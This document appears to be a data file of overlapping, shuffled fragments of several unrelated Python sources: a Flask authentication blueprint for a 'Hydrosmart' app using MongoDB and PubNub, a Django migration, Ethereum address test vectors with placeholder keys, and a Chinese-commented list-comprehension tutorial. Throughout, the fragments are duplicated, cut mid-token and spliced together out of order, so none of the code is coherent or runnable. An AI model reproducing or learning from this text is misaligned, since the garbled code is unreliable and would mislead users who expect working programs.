Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET',", "User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart',", "error = 'Username already exists' else: new_user = {'username' :", "ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart',", "request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'],", "None return User(u['username']) def callback(message, channel): db.data.insert_one(message) def error(message): db.data.insert_one(message)", "not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. Please try again.'", "= SignupForm(request.form) error = None if request.method == 'POST': existing_user", ".models import User from .forms import LoginForm, SignupForm mod_auth =", "Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required", ": request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'], 'password' :", "= db.users.find_one({'username': username}) if not u: return None return User(u['username'])", "request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return", "= 'Invalid credentials. Please try again.' else: user_obj = User(user['username'])", "from werkzeug import check_password_hash, generate_password_hash from app import db, login_manager,", "'POST']) def login(): form = LoginForm(request.form) error = None print(request.method)", "db.users.find_one({'username': request.form['username']}) if not user: error = 'User does not", "if request.method == 'POST': user = db.users.find_one({'username': request.form['username']}) if not", "== 'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user: error", "redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u", "if existing_user: error = 'Username already exists' else: new_user =", "Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form = LoginForm(request.form)", "elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. Please try", "None print(request.method) if request.method == 'POST': user = db.users.find_one({'username': request.form['username']})", "not u: return None return User(u['username']) def callback(message, channel): db.data.insert_one(message)", "return redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username}) if", "print(request.method) if request.method == 'POST': user = db.users.find_one({'username': request.form['username']}) if", "db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True,", "user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In", "again.' else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html',", "db.users.find_one({'username': username}) if not u: return None return User(u['username']) def", "error = 'User does not exist' elif not check_password_hash(user['password'], request.form['password']):", "None if request.method == 'POST': existing_user = db.users.find_one({'username' : request.form['username']})", "url_for, request, flash from flask.ext.login import login_required, login_user, logout_user from", "LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def", "request.method == 'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user:", "user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True,", "flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader", "if not u: return None return User(u['username']) def callback(message, channel):", "User from .forms import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__)", "return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error)", "error = None if request.method == 'POST': existing_user = db.users.find_one({'username'", "import User from .forms import LoginForm, SignupForm mod_auth = Blueprint('auth',", "redirect, url_for, request, flash from flask.ext.login import login_required, login_user, logout_user", "title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\")", "import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST'])", ": request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user", "login_manager, pubnub, app, _callback from .models import User from .forms", "@login_required def logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def", "request, flash from flask.ext.login import login_required, login_user, logout_user from werkzeug", "@mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form = SignupForm(request.form) error =", "return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username):", "render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET',", "channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return", ": generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'],", "logout_user from werkzeug import check_password_hash, generate_password_hash from app import db,", "'Invalid credentials. Please try again.' else: user_obj = User(user['username']) login_user(user_obj)", "from .models import User from .forms import LoginForm, SignupForm mod_auth" ]
[ "migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True,", "Generated by Django 1.10.6 on 2017-04-06 06:02 from __future__ import", "-*- # Generated by Django 1.10.6 on 2017-04-06 06:02 from", "), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url',", "migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True,", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('economist',", "field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "[ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category',", "migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True),", "Django 1.10.6 on 2017-04-06 06:02 from __future__ import unicode_literals from", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'),", "Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations = [", "null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True),", "[ ('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article', name='alternativename',", "migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False),", "coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-06", "name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True,", "models class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations", "), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title',", "= [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ),", "name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ),", "# -*- coding: utf-8 -*- # Generated by Django 1.10.6", "migrations, models class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ]", "model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True),", "migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider', field=models.TextField(editable=False), ),", "<filename>economist/migrations/0003_auto_20170406_1402.py # -*- coding: utf-8 -*- # Generated by Django", "06:02 from __future__ import unicode_literals from django.db import migrations, models", "model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True),", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True,", "migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False),", "name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField(", "model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ),", "null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider',", "), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider', field=models.TextField(editable=False),", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article',", "utf-8 -*- # Generated by Django 1.10.6 on 2017-04-06 06:02", "operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "] operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ),", "null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ),", "model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ),", "model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider', field=models.TextField(editable=False), ), ]", "dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField(", "2017-04-06 06:02 from __future__ import unicode_literals from django.db import migrations,", "), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline',", "'0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True),", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source',", "1.10.6 on 2017-04-06 06:02 from __future__ import unicode_literals from django.db", "import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article',", "name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ),", "on 2017-04-06 06:02 from __future__ import unicode_literals from django.db import", "by Django 1.10.6 on 2017-04-06 06:02 from __future__ import unicode_literals", "class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations =", "# Generated by Django 1.10.6 on 2017-04-06 06:02 from __future__", "= [ ('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article',", "name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField(", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project',", "-*- coding: utf-8 -*- # Generated by Django 1.10.6 on", "from __future__ import unicode_literals from django.db import migrations, models class", "__future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration):", "null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True," ]
[ "(\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in", "conversion from private key to wif\"\"\" def setUp(self): self.test_add_vector =", "(\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"),", "publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address = address_from_publickey_ethereum(publickey)", "setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\",", "wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion", "from private key to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\",", "\"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\",", "from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of", "def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex)", "address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address = address_from_publickey_ethereum(publickey) self.assertEqual(address,", "\"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\",", "\"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\",", "to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"),", "unittest from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test", "[(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"),", "def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"),", "coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the", "bitcoin conversion from private key to wif\"\"\" def setUp(self): self.test_add_vector", "= [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\",", "address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from private", "\"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for", "(\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"),", "\"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\",", "(\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey", "import unittest from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase):", "import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin", "\"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected", "self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\", \"<KEY>\"), (\"<KEY>\", \"<KEY>\"),", "in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address = address_from_publickey_ethereum(publickey) self.assertEqual(address, address_expected)", "class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from private key", "TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from private key to", "for publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address =", "(\"<KEY>\", \"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"),", "\"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def", "(\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")]", "private key to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"),", "of the bitcoin conversion from private key to wif\"\"\" def", "(\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self):", "(\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"),", "the bitcoin conversion from private key to wif\"\"\" def setUp(self):", "wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\", \"0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97\"), (\"<KEY>\",", "\"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey =", "\"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector:", "\"\"\"test of the bitcoin conversion from private key to wif\"\"\"", "key to wif\"\"\" def setUp(self): self.test_add_vector = [(\"03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa\", \"<KEY>\"), (\"<KEY>\",", "test_address_testvector(self): for publickey_hex, address_expected in self.test_add_vector: publickey = bytearray.fromhex(publickey_hex) address", "\"<KEY>\"), (\"037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88\", \"0x0af4DbEf58063AEd75e6fF57610348E55954E8FB\"), (\"0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b\", \"<KEY>\"), (\"0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5\", \"<KEY>\"), (\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\",", "compute_public_key_sec256k1, address_from_publickey_ethereum class TestEthereum(unittest.TestCase): \"\"\"test of the bitcoin conversion from", "(\"028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a\", \"0x98447B7aC721BDeb197a7e72780f6f41BECA2919\"), (\"0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651\", \"0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4\"), (\"<KEY>\", \"<KEY>\")] def test_address_testvector(self): for publickey_hex," ]
[ "# print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item):", "set(my_dict.keys()) my_set = {key for key, value in my_dict.items()} print(type(my_set))", "\"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key for key, value", "my_set = set(my_dict.keys()) my_set = {key for key, value in", "1] print(odd_list) # 生成器表达式 odd_gen = (i for i in", "for i in range(21): # if i % 2 ==", "print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return", "== 1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作", "range(21): # if i % 2 == 1: # odd_list.append(i)", "i % 2 == 1] # print(odd_list) # 2. 逻辑复杂的情况", "# odd_list.append(i) # odd_list = [i for i in range(21)", "odd_gen = (i for i in range(21) if i %", "字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict", "in range(21) if i % 2 == 1] # print(odd_list)", "= {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key", "# 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item", "集合推导式 my_set = set(my_dict.keys()) my_set = {key for key, value", "= set(my_dict.keys()) my_set = {key for key, value in my_dict.items()}", "i in range(21) if i % 2 == 1] print(odd_list)", "% 2 == 1: # odd_list.append(i) # odd_list = [i", "in range(21) if i % 2 == 1) print(type(odd_gen)) for", "= (i for i in range(21) if i % 2", "i % 2 == 1) print(type(odd_gen)) for item in odd_gen:", "% 2 == 1) print(type(odd_gen)) for item in odd_gen: print(item)", "# 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list = [] #", "= [handle_item(i) for i in range(21) if i % 2", "if i % 2 == 1] # print(odd_list) # 2.", "odd_list.append(i) # odd_list = [i for i in range(21) if", "# odd_list = [] # for i in range(21): #", "生成器表达式 odd_gen = (i for i in range(21) if i", "列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list = [] # for", "* item odd_list = [handle_item(i) for i in range(21) if", "my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set = {key", "1: # odd_list.append(i) # odd_list = [i for i in", "in range(21) if i % 2 == 1] print(odd_list) #", "i % 2 == 1: # odd_list.append(i) # odd_list =", "i in range(21) if i % 2 == 1] #", "# if i % 2 == 1: # odd_list.append(i) #", "[handle_item(i) for i in range(21) if i % 2 ==", "for i in range(21) if i % 